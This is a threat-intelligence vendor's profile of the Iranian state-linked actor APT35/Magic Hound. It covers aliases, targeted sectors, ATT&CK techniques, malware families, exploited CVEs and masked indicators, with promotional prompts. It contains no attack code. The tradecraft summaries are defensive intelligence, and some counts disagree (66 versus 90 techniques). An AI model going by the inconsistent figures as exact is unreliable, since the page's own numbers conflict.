Iran🇮🇷 IR45 malware familiesExploits CVEs in the wild

Magic Hound

Also known asagent_serpensAPT35Bohriumcalanquecharming_kittencharming_kitten_aptCOBALT ILLUSIONcobalt_mirageCrimson SandstormCuboid SandstormCURIUMDEV-0228HOUSEBLENDIMPERIAL KITTENITG18Magic HoundMint SandstormnewsbeefNewscasterNimbus ManticoreParastoophosphorousphosphorusSmoke SandstormTA453TA455TA456Tortoise ShellTortoiseshellUNC1549Yellow Liderc

APT35 is an Iranian state-linked threat actor widely tied in the provided content to the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC IO). Known aliases in the content include Magic Hound, Charming Kitten, APT35, Phosphorous/Phosphorus, TA453, TA455, TA456, Mint Sandstorm, Crimson Sandstorm, Smoke Sandstorm, Agent Serpens, Cobalt Mirage, Cobalt Illusion, Imperial Kitten, ITG18, NewsBeef, Newscaster, Parastoo, Tortoiseshell, UNC1549, Nimbus Manticore, Bohrium, Calanque, Cuboid Sandstorm, Curium, DEV-0228, Houseblend, Yellow Liderc, and others. The content describes this actor as active since at least 2014 and engaged in cyber espionage. Reported targeting includes individuals and organizations in academic research, government, human rights groups, media, military, and technology sectors in Iran, the United States, Israel, and the United Kingdom; energy, government, and technology sectors in Saudi Arabia; and, under UNC1549/Nimbus Manticore tracking, aerospace, aviation, and defense organizations across the Middle East, South Asia, and Western Europe. The content also states that TA453 targeted senior medical researchers in the United States and Israel in late 2020, and in 2024 targeted a prominent Jewish religious figure using a fake podcast invitation. Tradecraft directly mentioned in the content includes credential phishing, social engineering, fake recruitment and career portals, spoofed institutional identities, malicious email attachments, and malware delivery through multi-stage payloads. The actor has used HTTP for command and control. ATT&CK-style behavior attributed in the content to Magic Hound/Curium includes luring victims into opening malicious email attachments, exfiltrating data from compromised machines, gathering local IP address, MAC address, external IP address, and victim username, listing logical drives and directory contents, and determining whether newly dropped files should execute in a hidden window. Malware and tooling directly associated in the content include BellaCiao, publicly attributed there to Charming Kitten, and BellaCPP, assessed with medium-to-high confidence as associated with Charming Kitten; Drokbk, operated by a subgroup of Cobalt Mirage; BlackSmith and the AnvilEcho PowerShell trojan used by TA453; and TOTPGuard used in Nimbus Manticore recruitment-themed operations. The content also describes a late-2025 leak of internal APT35 documents that allegedly revealed a hierarchical, quota-driven espionage organization tied to the IRGC IO, with operations from May 2022 through October 2025 including Exchange exploitation and data exfiltration against regional government, diplomatic, judicial, and infrastructure targets.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

Commercial & Professional Services
Military

Where they're from

Attributed origin per open-source reporting.

MITRE ATT&CK

Tradecraft

66 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

14 of 15 tactics90 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0043

Reconnaissance

2 techniques

T1589

Gather Victim Identity Information

T1598×2

Phishing for Information

T1598.003

Spearphishing Link

TA0042

Resource Development

1 technique

T1586

Compromise Accounts

TA0001

Initial Access

4 techniques

T1078

Valid Accounts

T1078.004

Cloud Accounts

T1189

Drive-by Compromise

T1190×4

Exploit Public-Facing Application

T1566

Phishing

T1566.001

Spearphishing Attachment

T1566.002×3

Spearphishing Link

T1566.003×3

Spearphishing via Service

TA0002

Execution

5 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1059×2

Command and Scripting Interpreter

T1059.001×2

PowerShell

T1203

Exploitation for Client Execution

T1204

User Execution

T1204.002×3

Malicious File

T1574×2

Hijack Execution Flow

T1574.001

DLL

TA0003

Persistence

4 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1078

Valid Accounts

T1078.004

Cloud Accounts

T1505

Server Software Component

T1505.003

Web Shell

T1543

Create or Modify System Process

T1543.003×3

Windows Service

TA0004

Privilege Escalation

3 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1078

Valid Accounts

T1078.004

Cloud Accounts

T1543

Create or Modify System Process

T1543.003×3

Windows Service

TA0005

Stealth

9 techniques

T1027×5

Obfuscated Files or Information

T1027.003

Steganography

T1027.007

Dynamic API Resolution

T1036×3

Masquerading

T1078

Valid Accounts

T1078.004

Cloud Accounts

T1140×2

Deobfuscate/Decode Files or Information

T1497

Virtualization/Sandbox Evasion

T1497.001

System Checks

T1564

Hide Artifacts

T1564.003

Hidden Window

T1574×2

Hijack Execution Flow

T1574.001

DLL

T1620

Reflective Code Loading

T1622

Debugger Evasion

TA0112

Defense Impairment

1 technique

T1553

Subvert Trust Controls

T1553.006

Code Signing Policy Modification

TA0006

Credential Access

4 techniques

T1056

Input Capture

T1056.001

Keylogging

T1111

Multi-Factor Authentication Interception

T1539

Steal Web Session Cookie

T1621

Multi-Factor Authentication Request Generation

TA0007

Discovery

7 techniques

T1016

System Network Configuration Discovery

T1033

System Owner/User Discovery

T1082

System Information Discovery

T1083×3

File and Directory Discovery

T1217

Browser Information Discovery

T1497

Virtualization/Sandbox Evasion

T1497.001

System Checks

T1622

Debugger Evasion

TA0008

Lateral Movement

1 technique

T1021

Remote Services

T1021.004

SSH

TA0009

Collection

7 techniques

T1005

Data from Local System

T1056

Input Capture

T1056.001

Keylogging

T1113

Screen Capture

T1114

Email Collection

T1114.002

Remote Email Collection

T1123

Audio Capture

T1213

Data from Information Repositories

T1560

Archive Collected Data

TA0011

Command and Control

6 techniques

T1071×4

Application Layer Protocol

T1071.001

Web Protocols

T1071.004

DNS

T1102

Web Service

T1102.001

Dead Drop Resolver

T1105×3

Ingress Tool Transfer

T1219

Remote Access Tools

T1568

Dynamic Resolution

T1568.002

Domain Generation Algorithms

T1572

Protocol Tunneling

TA0010

Exfiltration

3 techniques

T1041×5

Exfiltration Over C2 Channel

T1048

Exfiltration Over Alternative Protocol

T1567

Exfiltration Over Web Service

T1567.002×2

Exfiltration to Cloud Storage

ARSENAL

Associated malware families

45 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

MiniJunkThe attacks, seen throughout the 2026 Iran war in March, followed previous campaigns throughout February using an older backdoor called MiniJunk.11May 27, 2026

MiniBikeMandiant observed the following custom malware families used in the suspected UNC1549 activity. MINIBIKE — A custom backdoor written in C++ capable of file exfiltration and upload, command execution, and more. Communicates using Azure cloud infrastructure.6May 31, 2026

MiniBrowseMiniBrowse is a lightweight stealer used by Nimbus Manticore. We observed two variants, one to steal Chrome credentials and another which targets Edge.6May 26, 2026

MiniFastThe Iran state-sponsored threat group Nimbus Manticore conducted attacks during the U.S.-Israel military campaign Operation Epic Fury targeting the U.S. aviation industry and others for deployment of a new AI-assisted backdoor called “MiniFast,” Check Point Research reported Friday.5May 27, 2026

BellaCiaoBellaCiao is a .NET-based malware family that adds a unique twist to an intrusion, combining the stealthy persistence of a webshell with the power to establish covert tunnels.4Jun 14, 2026

40 additional families tracked in Mallory.

WEAPONIZED

Associated vulnerabilities

18 CVEs this actor has used in observed campaigns. 18 of them exploited in the wild.

CVE-2021-34473ProxyShell pre-auth SSRF in Microsoft Exchange AutodiscoverIn the wildEvidence6

These campaigns leveraged vulnerabilities like ProxyShell to extract Global Address Lists (GALs), providing a systematic feed for further credential harvesting and long-term espionage.

CVE-2021-44228Log4ShellIn the wildEvidence4

The February intrusion that Secureworks incident responders investigated began with a compromise of a VMware Horizon server using two Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046).

CVE-2023-27350Unauthenticated Authentication Bypass and RCE in PaperCut MF/NGIn the wildEvidence3

Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print management servers. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access Control Vulnerability. PaperCut MF/NG contains an improper access control vulnerability within the SetupCompleted class that allows authentication bypass and code execution in the context of SYSTEM.

CVE-2021-31207Post-auth Arbitrary File Write in Microsoft Exchange Server (ProxyShell)In the wildEvidence2

FIN7 has compromised targeted organizations through exploitation of CVE-2021-31207 in Exchange. ... Magic Hound has exploited ... ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

CVE-2024-1709Authentication Bypass in ConnectWise ScreenConnectIn the wildEvidence2

APT35 , also known as Magic Hound, has confirmed active exploitation of ... ConnectWise ScreenConnect (CVE-2024-1709)

13 more CVEs tied to this actor tracked in Mallory.

IOCS

Observables

385 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

385 IOCsView more in app

Domains

197 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com•••••••••••.ru••••••••••••.com••••••.ru+189

hash.sha256

85 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+77

hash.md5

75 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+67

ip.v4

18 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+10

hash.sha1

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

uri

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

20 SOURCESView more in app

malware newsNews

Jun 16, 2026

UNC1549 TTPs: Iranian APT Targeting Aerospace and Defense - Malware News - Malware Analysis, News and Indicators

Cyber-espionage operations targeting aerospace, aviation, and defense organizations, using fake React-based career portals to deliver multi-stage payloads and exfiltrating data over encrypted C2 channels.

splunk researchNews

Jun 14, 2026

Detection: PTC Windchill Gateway Command Execution | Splunk Security Content

Listed as an associated threat actor in the detection annotation for exploitation of the public-facing PTC Windchill vulnerability CVE-2026-4681.

cyber security newsNews

Jun 2, 2026

Nimbus Manticore APT Abuses Fake Recruitment Portal to Deliver Custom Malware

Conducting a fake recruitment campaign via LinkedIn and a spoofed hiring portal to deliver a multi-stage malware chain against aerospace and defense professionals.

scworldNews

May 27, 2026

Iranian threat group targets US aviation sector with AI-assisted ‘MiniFast’ backdoor | news | SC Media

Iranian state-sponsored espionage activity targeting the U.S. aviation industry, software development sector, and regional defense/aerospace organizations using career-themed phishing and, more recently, SEO poisoning to deliver backdoors including MiniFast and MiniJunk.

+195 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping66

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal45

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs18

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables385

Domains, IPs, and hashes tied to this actor, refreshed continuously.